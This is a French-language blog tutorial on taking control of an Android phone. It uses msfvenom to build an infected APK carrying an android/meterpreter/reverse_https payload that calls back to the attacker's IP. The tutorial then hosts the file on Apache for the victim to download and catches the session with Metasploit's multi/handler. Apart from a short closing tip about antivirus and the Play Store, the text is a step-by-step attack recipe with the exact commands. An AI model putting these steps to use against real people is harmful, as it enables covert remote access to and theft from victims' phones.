Le système d’exploitation Android est le système d’exploitation le plus fréquent dans le marché de la vente des smartphone et des tablettes.Il dispose donc de plusieurs outils de développement d’applications.
Chaque fois qu’un programme ou un système est très présent dans le marché,sachiez que ce programme ou ce système incite généralement les hackers à s’intéresser davantage à ce dernier.
Dans la suite de nos écrits,nous allons voir comment les hackers peuvent rapidement prendre le contrôle de tout appareil disposant du système d’exploitation Android en un temps record en utilisant le framework metasploit comme nous l’avons vu dans l’article suivant:source
Lab:
Une machine attaquante (Kali Linux)
Un smartphone (Android)
Ouvrons un terminal sur la machine Kali et commençons par récupérer l’adresse IP de cette machine comme le montre l’image ci-dessous avec la commande ifconfig
Tapons maintenant la commande qui va nous permettre de créer un fichier APK infecté sur notre bureau:
msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.26 LPORT=4444 R>ressonoa.apk
La figure ci-dessus montre que notre fichier infecté ressonoa.apk a bien été crée.Voici une description des options:
-p : spécifie le type de payload
LHOST:spécifie l’adresse IP de la machine attaquante.
LPORT:spécifie le numéro de port
R:spécifie le format Raw
Cette attaque s’effectue dans un réseau local et nous allons simplement utiliser le serveur Apache2 mais avant tout nous devons d’abord déplacer notre fichier infecté à la racine de notre serveur web en tapant la commande:
mv ressonoa.apk /var/www/html
Une fois le fichier est déplacé,nous devons aller supprimer le fichier index.html en nous déplaçant avec la commande cd /var/www/html et en tapant la commande rm index.html
Maintenant nous allons démarrer notre serveur web en tapant la commande /etc/init.d/apache2 start
Ouvrons un autre terminal et tapons la commande qui va nous permettre d’initialiser une base de données dans l’outil metasploit:
msfdb init
La base de données étant prête, nous allons utiliser l’exploit multi/handler pour lancer l’écoute comme le montre l’image ci-dessus:
La figure ci-dessus décrit tous les paramètres que nous avons renseigné.
Dès que ce sera fait,il nous suffira de lancer notre écoute avec la commande exploit comme le montre l’image ci-dessous:
Notre serveur est donc en mode écoute comme le montre la figure ci-dessus.
Pour prendre le contrôle de l’appareil Android,il nous suffira d’ouvrir un navigateur sur l’appareil cible et de renseigner l’adresse: http://192.168.1.26 dans la barre d’URL et nous aurons ceci:
Le fichier infecté est prêt à être télécharger:
Lorsque la victime va installer le fichier infecté ressonoa.apk sur son appareil,le hacker aura une session metepreter du côté de sa machine comme sur l’image ci-dessous:
Il ne vous reste plus qu’à pleurer comme Homer Simpson.
Pour voir les informations du système,il nous suffira de taper la commande sysinfo:
Pour se protéger contre ce type d’attaque la moindre des choses est d’installer un bon antivirus comme Dr.Web.Il ne faut jamais installer une application douteuse dans son appareil Android.Il est mieux de faire confiance aux marchés comme le célèbre Play store.
Merci les amis!
🙂
Passionné de cryptographie,de sécurité informatique, de mathématiques en gros des nouvelles technologies de l’information et de la communication. J’♥️ aussi le graphisme.Le partage est pour moi le véritable moyen de pouvoir vivre de sa vraie passion.Vous pouvez me contacter de différentes manières:Contact,Facebook,Twitter,Instagram,Pinterest.